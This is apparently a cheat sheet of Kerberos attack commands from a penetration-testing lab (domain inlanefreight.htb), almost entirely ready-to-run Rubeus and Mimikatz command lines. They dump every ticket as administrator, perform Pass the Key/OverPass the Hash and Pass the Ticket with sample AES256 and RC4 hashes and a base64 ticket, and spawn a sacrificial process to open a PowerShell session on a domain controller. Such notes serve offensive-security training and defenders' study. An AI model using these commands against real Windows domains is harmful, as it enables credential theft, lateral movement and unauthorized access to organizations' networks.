Rubeus.exe

Note: To collect all tickets we need to execute Mimikatz or Rubeus as an administrator.

# It will dump all tickets if running as local admin
# /nowrap for easier copy-paste.
Rubeus.exe dump /nowrap

Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't.

# This will Pass the Key or OverPass the Hash
# First you have to get the kerberos keys from mimikatz you will get aes256
Rubeus.exe  asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap

# This will Pass the ticket
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt

# Another way is to import the ticket into the current session using the .kirbi file from the disk.
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi

# Another way is to convert .kirbi to base64 then pass it 
[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"))

# Get the result from above and do like this
# You can also get the base64 decoded ticker from rubeus dump /nowrap
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/<SNIP>

# This will PowerShell Remoting with Pass the Ticket
# First Create a Sacrificial Process with Rubeus
# This will create a new cmd window
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

# Then we are going to ask for new tgt with option /ptt
# So that we can import our ticket into current session and connect to DC remotely
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt

# Then use powershell
powershell
Enter-PSSession -ComputerName DC01
whoami 
hostname